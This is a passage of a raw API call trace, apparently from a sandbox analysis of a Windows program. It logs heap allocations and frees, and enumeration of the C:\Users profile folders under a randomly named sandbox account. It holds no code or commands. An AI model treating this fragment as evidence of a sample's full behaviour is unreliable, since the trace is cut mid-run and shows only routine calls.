ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0183.447] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0183.447] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0183.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0183.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.447] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0183.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.447] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0183.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.447] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0183.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0183.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.447] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0183.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0183.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.448] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0183.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.448] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0183.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.448] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0183.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0183.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.448] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0183.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.448] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0183.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.448] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0183.448] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.448] PathFindFileNameW (pszPath="") returned="" [0183.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.448] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0183.449] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0183.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0183.449] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e776e0 [0183.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83ac0 [0183.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838e0 | out: hHeap=0x620000) returned 1 [0183.450] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0183.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0183.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83ac0 | out: hHeap=0x620000) returned 1 [0183.452] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83ac0 [0183.452] FindFirstFileW (in: lpFileName="C:\\Users\\*" (normalized: "c:\\users\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0183.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83ac0 | out: hHeap=0x620000) returned 1 [0183.452] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.453] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0183.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9680 [0183.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0183.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0183.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96f0 | out: hHeap=0x620000) returned 1 [0183.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0183.454] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x629b4b20, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x629b4b20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0183.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9680 [0183.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0183.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9728 [0183.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96f0 | out: hHeap=0x620000) returned 1 [0183.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0183.454] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0183.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9680 [0183.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0183.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0183.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96f0 | out: hHeap=0x620000) returned 1 [0183.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0183.455] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0183.455] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 1 [0183.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9680 [0183.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0183.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2e915e0 [0183.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96f0 | out: hHeap=0x620000) returned 1 [0183.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0183.456] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0183.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83ac0 [0183.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9680 [0183.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83ac0 | out: hHeap=0x620000) returned 1 [0183.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0183.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x498) returned 0x2e935c8 [0183.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83ac0 [0183.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837f0 [0183.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838e0 [0183.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0183.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cc8 [0183.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83ca0 [0183.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c78 [0183.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c50 [0183.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c28 [0183.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83c00 [0183.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83bd8 [0183.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839a8 [0183.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83958 [0183.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a48 [0183.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0183.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a98 [0183.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83ef8 [0183.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f20 [0183.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f48 [0183.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0183.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0183.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0183.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0183.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e84010 [0183.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2e91618 [0183.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2e91650 [0183.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2e91688 [0183.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2e916c0 [0183.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0183.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b38 | out: hHeap=0x620000) returned 1 [0183.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b10 | out: hHeap=0x620000) returned 1 [0183.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83ae8 | out: hHeap=0x620000) returned 1 [0183.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83980 | out: hHeap=0x620000) returned 1 [0183.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83930 | out: hHeap=0x620000) returned 1 [0183.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e839f8 | out: hHeap=0x620000) returned 1 [0183.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83d18 | out: hHeap=0x620000) returned 1 [0183.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83d40 | out: hHeap=0x620000) returned 1 [0183.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83d68 | out: hHeap=0x620000) returned 1 [0183.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83d90 | out: hHeap=0x620000) returned 1 [0183.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83db8 | out: hHeap=0x620000) returned 1 [0183.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83de0 | out: hHeap=0x620000) returned 1 [0183.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83e08 | out: hHeap=0x620000) returned 1 [0183.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83e30 | out: hHeap=0x620000) returned 1 [0183.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83e58 | out: hHeap=0x620000) returned 1 [0183.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83e80 | out: hHeap=0x620000) returned 1 [0183.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83ea8 | out: hHeap=0x620000) returned 1 [0183.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83ed0 | out: hHeap=0x620000) returned 1 [0183.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b88 | out: hHeap=0x620000) returned 1 [0183.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83bb0 | out: hHeap=0x620000) returned 1 [0183.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a20 | out: hHeap=0x620000) returned 1 [0183.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83908 | out: hHeap=0x620000) returned 1 [0183.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e839d0 | out: hHeap=0x620000) returned 1 [0183.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0183.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0183.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9760 | out: hHeap=0x620000) returned 1 [0183.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0183.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0183.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2e915e0 [0183.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96f0 | out: hHeap=0x620000) returned 1 [0183.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0183.465] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0183.465] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0183.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83840 | out: hHeap=0x620000) returned 1 [0183.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83840 [0183.465] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0183.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839d0 [0183.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e839d0 | out: hHeap=0x620000) returned 1 [0183.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839d0 [0183.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e839d0 | out: hHeap=0x620000) returned 1 [0183.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839d0 [0183.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e839d0 | out: hHeap=0x620000) returned 1 [0183.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839d0 [0183.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e839d0 | out: hHeap=0x620000) returned 1 [0183.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839d0 [0183.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e839d0 | out: hHeap=0x620000) returned 1 [0183.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839d0 [0183.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.471] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e839d0 | out: hHeap=0x620000) returned 1 [0183.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839d0 [0183.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0183.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.472] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e839d0 | out: hHeap=0x620000) returned 1 [0183.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839d0 [0183.472] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e839d0 | out: hHeap=0x620000) returned 1 [0183.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839d0 [0183.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.473] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e839d0 | out: hHeap=0x620000) returned 1 [0183.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839d0 [0183.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e839d0 | out: hHeap=0x620000) returned 1 [0183.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839d0 [0183.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e839d0 | out: hHeap=0x620000) returned 1 [0183.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e839d0 [0183.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e839d0 | out: hHeap=0x620000) returned 1 [0183.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83840 | out: hHeap=0x620000) returned 1 [0183.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0183.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83778 | out: hHeap=0x620000) returned 1 [0183.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0183.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83818 | out: hHeap=0x620000) returned 1 [0183.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83868 | out: 